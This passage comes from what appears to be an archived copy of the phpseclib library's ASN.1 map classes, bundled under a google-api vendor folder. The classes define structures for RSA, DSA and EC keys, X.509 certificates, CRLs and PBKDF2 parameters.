'publicExponent' => ['type' => ASN1::TYPE_INTEGER], // e 'privateExponent' => ['type' => ASN1::TYPE_INTEGER], // d 'prime1' => ['type' => ASN1::TYPE_INTEGER], // p 'prime2' => ['type' => ASN1::TYPE_INTEGER], // q 'exponent1' => ['type' => ASN1::TYPE_INTEGER], // d mod (p-1) 'exponent2' => ['type' => ASN1::TYPE_INTEGER], // d mod (q-1) 'coefficient' => ['type' => ASN1::TYPE_INTEGER], // (inverse of q) mod p 'otherPrimeInfos' => OtherPrimeInfos::MAP + ['optional' => true] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/OrganizationalUnitNames.php000064400000001224147600400120025547 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * OrganizationalUnitNames * * @author Jim Wigginton */ abstract class OrganizationalUnitNames { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'min' => 1, 'max' => 4, // ub-organizational-units 'children' => ['type' => ASN1::TYPE_PRINTABLE_STRING] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PBKDF2params.php000064400000002033147600400120023055 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * PBKDF2params * * from https://tools.ietf.org/html/rfc2898#appendix-A.3 * * @author Jim Wigginton */ abstract class PBKDF2params { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ // technically, this is a CHOICE in RFC2898 but the other "choice" is, currently, more of a placeholder // in the RFC 'salt' => ['type' => ASN1::TYPE_OCTET_STRING], 'iterationCount' => ['type' => ASN1::TYPE_INTEGER], 'keyLength' => [ 'type' => ASN1::TYPE_INTEGER, 'optional' => true ], 'prf' => AlgorithmIdentifier::MAP + ['optional' => true] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/netscape_comment.php000064400000000761147600400120024273 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * netscape_comment * * @author Jim Wigginton */ abstract class netscape_comment { const MAP = ['type' => ASN1::TYPE_IA5_STRING]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/GeneralNames.php000064400000001102147600400120023276 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * GeneralNames * * @author Jim Wigginton */ abstract class GeneralNames { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'min' => 1, 'max' => -1, 'children' => GeneralName::MAP ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/BuiltInDomainDefinedAttributes.php000064400000001251147600400120026766 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * BuiltInDomainDefinedAttributes * * @author Jim Wigginton */ abstract class BuiltInDomainDefinedAttributes { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'min' => 1, 'max' => 4, // ub-domain-defined-attributes 'children' => BuiltInDomainDefinedAttribute::MAP ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/MaskGenAlgorithm.php000064400000000715147600400120024142 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; /** * MaskGenAglorithm * * @author Jim Wigginton */ abstract class MaskGenAlgorithm { const MAP = AlgorithmIdentifier::MAP; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/CPSuri.php000064400000000723147600400120022112 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * CPSuri * * @author Jim Wigginton */ abstract class CPSuri { const MAP = ['type' => ASN1::TYPE_IA5_STRING]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/UniqueIdentifier.php000064400000000761147600400120024220 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * UniqueIdentifier * * @author Jim Wigginton */ abstract class UniqueIdentifier { const MAP = ['type' => ASN1::TYPE_BIT_STRING]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/ExtKeyUsageSyntax.php000064400000001122147600400120024344 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * ExtKeyUsageSyntax * * @author Jim Wigginton */ abstract class ExtKeyUsageSyntax { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'min' => 1, 'max' => -1, 'children' => KeyPurposeId::MAP ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/DSAParams.php000064400000001243147600400120022516 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * DSAParams * * @author Jim Wigginton */ abstract class DSAParams { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'p' => ['type' => ASN1::TYPE_INTEGER], 'q' => ['type' => ASN1::TYPE_INTEGER], 'g' => ['type' => ASN1::TYPE_INTEGER] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/GeneralName.php000064400000004237147600400120023127 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * GeneralName * * @author Jim Wigginton */ abstract class GeneralName { const MAP = [ 'type' => ASN1::TYPE_CHOICE, 'children' => [ 'otherName' => [ 'constant' => 0, 'optional' => true, 'implicit' => true ] + AnotherName::MAP, 'rfc822Name' => [ 'type' => ASN1::TYPE_IA5_STRING, 'constant' => 1, 'optional' => true, 'implicit' => true ], 'dNSName' => [ 'type' => ASN1::TYPE_IA5_STRING, 'constant' => 2, 'optional' => true, 'implicit' => true ], 'x400Address' => [ 'constant' => 3, 'optional' => true, 'implicit' => true ] + ORAddress::MAP, 'directoryName' => [ 'constant' => 4, 'optional' => true, 'explicit' => true ] + Name::MAP, 'ediPartyName' => [ 'constant' => 5, 'optional' => true, 'implicit' => true ] + EDIPartyName::MAP, 'uniformResourceIdentifier' => [ 'type' => ASN1::TYPE_IA5_STRING, 'constant' => 6, 'optional' => true, 'implicit' => true ], 'iPAddress' => [ 'type' => ASN1::TYPE_OCTET_STRING, 'constant' => 7, 'optional' => true, 'implicit' => true ], 'registeredID' => [ 'type' => ASN1::TYPE_OBJECT_IDENTIFIER, 'constant' => 8, 'optional' => true, 'implicit' => true ] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PrivateKeyInfo.php000064400000001650147600400120023644 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * PrivateKeyInfo * * @author Jim Wigginton */ abstract class PrivateKeyInfo { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'version' => [ 'type' => ASN1::TYPE_INTEGER, 'mapping' => ['v1'] ], 'privateKeyAlgorithm' => AlgorithmIdentifier::MAP, 'privateKey' => PrivateKey::MAP, 'attributes' => [ 'constant' => 0, 'optional' => true, 'implicit' => true ] + Attributes::MAP ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/SubjectPublicKeyInfo.php000064400000001245147600400120024770 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * SubjectPublicKeyInfo * * @author Jim Wigginton */ abstract class SubjectPublicKeyInfo { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'algorithm' => AlgorithmIdentifier::MAP, 'subjectPublicKey' => ['type' => ASN1::TYPE_BIT_STRING] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PKCS9String.php000064400000001203147600400120022757 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * PKCS9String * * @author Jim Wigginton */ abstract class PKCS9String { const MAP = [ 'type' => ASN1::TYPE_CHOICE, 'children' => [ 'ia5String' => ['type' => ASN1::TYPE_IA5_STRING], 'directoryString' => DirectoryString::MAP ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/TBSCertList.php000064400000002534147600400120023051 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * TBSCertList * * @author Jim Wigginton */ abstract class TBSCertList { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'version' => [ 'type' => ASN1::TYPE_INTEGER, 'mapping' => ['v1', 'v2', 'v3'], 'optional' => true, 'default' => 'v2' ], 'signature' => AlgorithmIdentifier::MAP, 'issuer' => Name::MAP, 'thisUpdate' => Time::MAP, 'nextUpdate' => [ 'optional' => true ] + Time::MAP, 'revokedCertificates' => [ 'type' => ASN1::TYPE_SEQUENCE, 'optional' => true, 'min' => 0, 'max' => -1, 'children' => RevokedCertificate::MAP ], 'crlExtensions' => [ 'constant' => 0, 'optional' => true, 'explicit' => true ] + Extensions::MAP ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/NameConstraints.php000064400000001601147600400120024051 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * NameConstraints * * @author Jim Wigginton */ abstract class NameConstraints { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'permittedSubtrees' => [ 'constant' => 0, 'optional' => true, 'implicit' => true ] + GeneralSubtrees::MAP, 'excludedSubtrees' => [ 'constant' => 1, 'optional' => true, 'implicit' => true ] + GeneralSubtrees::MAP ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/OtherPrimeInfo.php000064400000001430147600400120023633 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * OtherPrimeInfo * * @author Jim Wigginton */ abstract class OtherPrimeInfo { // version must be multi if otherPrimeInfos present const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'prime' => ['type' => ASN1::TYPE_INTEGER], // ri 'exponent' => ['type' => ASN1::TYPE_INTEGER], // di 'coefficient' => ['type' => ASN1::TYPE_INTEGER] // ti ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/FieldElement.php000064400000000747147600400120023310 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * FieldElement * * @author Jim Wigginton */ abstract class FieldElement { const MAP = ['type' => ASN1::TYPE_OCTET_STRING]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/DistributionPointName.php000064400000001626147600400120025242 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * DistributionPointName * * @author Jim Wigginton */ abstract class DistributionPointName { const MAP = [ 'type' => ASN1::TYPE_CHOICE, 'children' => [ 'fullName' => [ 'constant' => 0, 'optional' => true, 'implicit' => true ] + GeneralNames::MAP, 'nameRelativeToCRLIssuer' => [ 'constant' => 1, 'optional' => true, 'implicit' => true ] + RelativeDistinguishedName::MAP ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PBES2params.php000064400000001305147600400120022761 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * PBES2params * * from https://tools.ietf.org/html/rfc2898#appendix-A.3 * * @author Jim Wigginton */ abstract class PBES2params { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'keyDerivationFunc' => AlgorithmIdentifier::MAP, 'encryptionScheme' => AlgorithmIdentifier::MAP ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/IssuerAltName.php000064400000000675147600400120023467 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; /** * IssuerAltName * * @author Jim Wigginton */ abstract class IssuerAltName { const MAP = GeneralNames::MAP; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/GeneralSubtree.php000064400000001660147600400120023655 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * GeneralSubtree * * @author Jim Wigginton */ abstract class GeneralSubtree { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'base' => GeneralName::MAP, 'minimum' => [ 'constant' => 0, 'optional' => true, 'implicit' => true, 'default' => '0' ] + BaseDistance::MAP, 'maximum' => [ 'constant' => 1, 'optional' => true, 'implicit' => true, ] + BaseDistance::MAP ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/BuiltInStandardAttributes.php000064400000003744147600400120026051 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * BuiltInStandardAttributes * * @author Jim Wigginton */ abstract class BuiltInStandardAttributes { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'country-name' => ['optional' => true] + CountryName::MAP, 'administration-domain-name' => ['optional' => true] + AdministrationDomainName::MAP, 'network-address' => [ 'constant' => 0, 'optional' => true, 'implicit' => true ] + NetworkAddress::MAP, 'terminal-identifier' => [ 'constant' => 1, 'optional' => true, 'implicit' => true ] + TerminalIdentifier::MAP, 'private-domain-name' => [ 'constant' => 2, 'optional' => true, 'explicit' => true ] + PrivateDomainName::MAP, 'organization-name' => [ 'constant' => 3, 'optional' => true, 'implicit' => true ] + OrganizationName::MAP, 'numeric-user-identifier' => [ 'constant' => 4, 'optional' => true, 'implicit' => true ] + NumericUserIdentifier::MAP, 'personal-name' => [ 'constant' => 5, 'optional' => true, 'implicit' => true ] + PersonalName::MAP, 'organizational-unit-names' => [ 'constant' => 6, 'optional' => true, 'implicit' => true ] + OrganizationalUnitNames::MAP ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/netscape_cert_type.php000064400000001512147600400120024622 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * netscape_cert_type * * mapping is from * * @author Jim Wigginton */ abstract class netscape_cert_type { const MAP = [ 'type' => ASN1::TYPE_BIT_STRING, 'mapping' => [ 'SSLClient', 'SSLServer', 'Email', 'ObjectSigning', 'Reserved', 'SSLCA', 'EmailCA', 'ObjectSigningCA' ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PostalAddress.php000064400000001145147600400120023514 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * PostalAddress * * @author Jim Wigginton */ abstract class PostalAddress { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'optional' => true, 'min' => 1, 'max' => -1, 'children' => DirectoryString::MAP ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PrivateDomainName.php000064400000001244147600400120024307 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * PrivateDomainName * * @author Jim Wigginton */ abstract class PrivateDomainName { const MAP = [ 'type' => ASN1::TYPE_CHOICE, 'children' => [ 'numeric' => ['type' => ASN1::TYPE_NUMERIC_STRING], 'printable' => ['type' => ASN1::TYPE_PRINTABLE_STRING] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/PublicKey.php000064400000000734147600400120022636 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * PublicKey * * @author Jim Wigginton */ abstract class PublicKey { const MAP = ['type' => ASN1::TYPE_BIT_STRING]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/OneAsymmetricKey.php000064400000002207147600400120024174 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * OneAsymmetricKey * * @author Jim Wigginton */ abstract class OneAsymmetricKey { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'version' => [ 'type' => ASN1::TYPE_INTEGER, 'mapping' => ['v1', 'v2'] ], 'privateKeyAlgorithm' => AlgorithmIdentifier::MAP, 'privateKey' => PrivateKey::MAP, 'attributes' => [ 'constant' => 0, 'optional' => true, 'implicit' => true ] + Attributes::MAP, 'publicKey' => [ 'constant' => 1, 'optional' => true, 'implicit' => true ] + PublicKey::MAP ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/CertificateIssuer.php000064400000000711147600400120024357 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; /** * CertificateIssuer * * @author Jim Wigginton */ abstract class CertificateIssuer { const MAP = GeneralNames::MAP; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/CountryName.php000064400000001625147600400120023213 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * CountryName * * @author Jim Wigginton */ abstract class CountryName { const MAP = [ 'type' => ASN1::TYPE_CHOICE, // if class isn't present it's assumed to be \phpseclib3\File\ASN1::CLASS_UNIVERSAL or // (if constant is present) \phpseclib3\File\ASN1::CLASS_CONTEXT_SPECIFIC 'class' => ASN1::CLASS_APPLICATION, 'cast' => 1, 'children' => [ 'x121-dcc-code' => ['type' => ASN1::TYPE_NUMERIC_STRING], 'iso-3166-alpha2-code' => ['type' => ASN1::TYPE_PRINTABLE_STRING] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/EDIPartyName.php000064400000002062147600400120023165 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * EDIPartyName * * @author Jim Wigginton */ abstract class EDIPartyName { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'nameAssigner' => [ 'constant' => 0, 'optional' => true, 'implicit' => true ] + DirectoryString::MAP, // partyName is technically required but \phpseclib3\File\ASN1 doesn't currently support non-optional constants and // setting it to optional gets the job done in any event. 'partyName' => [ 'constant' => 1, 'optional' => true, 'implicit' => true ] + DirectoryString::MAP ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/DSAPrivateKey.php000064400000001516147600400120023361 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * DSAPrivateKey * * @author Jim Wigginton */ abstract class DSAPrivateKey { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'version' => ['type' => ASN1::TYPE_INTEGER], 'p' => ['type' => ASN1::TYPE_INTEGER], 'q' => ['type' => ASN1::TYPE_INTEGER], 'g' => ['type' => ASN1::TYPE_INTEGER], 'y' => ['type' => ASN1::TYPE_INTEGER], 'x' => ['type' => ASN1::TYPE_INTEGER] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/Trinomial.php000064400000000731147600400120022702 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * Trinomial * * @author Jim Wigginton */ abstract class Trinomial { const MAP = ['type' => ASN1::TYPE_INTEGER]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/UserNotice.php000064400000001440147600400120023022 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * UserNotice * * @author Jim Wigginton */ abstract class UserNotice { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'noticeRef' => [ 'optional' => true, 'implicit' => true ] + NoticeReference::MAP, 'explicitText' => [ 'optional' => true, 'implicit' => true ] + DisplayText::MAP ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/KeyIdentifier.php000064400000000752147600400120023502 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * KeyIdentifier * * @author Jim Wigginton */ abstract class KeyIdentifier { const MAP = ['type' => ASN1::TYPE_OCTET_STRING]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/SpecifiedECDomain.php000064400000002130147600400120024172 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * SpecifiedECDomain * * @author Jim Wigginton */ abstract class SpecifiedECDomain { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'version' => [ 'type' => ASN1::TYPE_INTEGER, 'mapping' => [1 => 'ecdpVer1', 'ecdpVer2', 'ecdpVer3'] ], 'fieldID' => FieldID::MAP, 'curve' => Curve::MAP, 'base' => ECPoint::MAP, 'order' => ['type' => ASN1::TYPE_INTEGER], 'cofactor' => [ 'type' => ASN1::TYPE_INTEGER, 'optional' => true ], 'hash' => ['optional' => true] + HashAlgorithm::MAP ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/CertificationRequestInfo.php000064400000001671147600400120025720 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * CertificationRequestInfo * * @author Jim Wigginton */ abstract class CertificationRequestInfo { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'version' => [ 'type' => ASN1::TYPE_INTEGER, 'mapping' => ['v1'] ], 'subject' => Name::MAP, 'subjectPKInfo' => SubjectPublicKeyInfo::MAP, 'attributes' => [ 'constant' => 0, 'optional' => true, 'implicit' => true ] + Attributes::MAP, ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/NetworkAddress.php000064400000000757147600400120023713 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * NetworkAddress * * @author Jim Wigginton */ abstract class NetworkAddress { const MAP = ['type' => ASN1::TYPE_NUMERIC_STRING]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/SubjectInfoAccessSyntax.php000064400000001151147600400120025505 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * SubjectInfoAccessSyntax * * @author Jim Wigginton */ abstract class SubjectInfoAccessSyntax { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'min' => 1, 'max' => -1, 'children' => AccessDescription::MAP ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/InvalidityDate.php000064400000000761147600400120023661 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * InvalidityDate * * @author Jim Wigginton */ abstract class InvalidityDate { const MAP = ['type' => ASN1::TYPE_GENERALIZED_TIME]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/ECPrivateKey.php000064400000002176147600400120023244 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * ECPrivateKey * * @author Jim Wigginton */ abstract class ECPrivateKey { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'version' => [ 'type' => ASN1::TYPE_INTEGER, 'mapping' => [1 => 'ecPrivkeyVer1'] ], 'privateKey' => ['type' => ASN1::TYPE_OCTET_STRING], 'parameters' => [ 'constant' => 0, 'optional' => true, 'explicit' => true ] + ECParameters::MAP, 'publicKey' => [ 'type' => ASN1::TYPE_BIT_STRING, 'constant' => 1, 'optional' => true, 'explicit' => true ] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/AlgorithmIdentifier.php000064400000001347147600400120024701 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * AlgorithmIdentifier * * @author Jim Wigginton */ abstract class AlgorithmIdentifier { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'algorithm' => ['type' => ASN1::TYPE_OBJECT_IDENTIFIER], 'parameters' => [ 'type' => ASN1::TYPE_ANY, 'optional' => true ] ] ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/SubjectDirectoryAttributes.php000064400000001152147600400120026275 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * SubjectDirectoryAttributes * * @author Jim Wigginton */ abstract class SubjectDirectoryAttributes { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'min' => 1, 'max' => -1, 'children' => Attribute::MAP ]; } google-api/vendor/phpseclib/phpseclib/phpseclib/File/ASN1/Maps/CertificateList.php000064400000001307147600400120024022 0ustar00 * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace phpseclib3\File\ASN1\Maps; use phpseclib3\File\ASN1; /** * CertificateList * * @author Jim Wigginton */ abstract class CertificateList { const MAP = [ 'type' => ASN1::TYPE_SEQUENCE, 'children' => [ 'tbsCertList' => TBSCertList::MAP, 'signatureAlgorithm' => AlgorithmIdentifier::MAP, 'signature' => 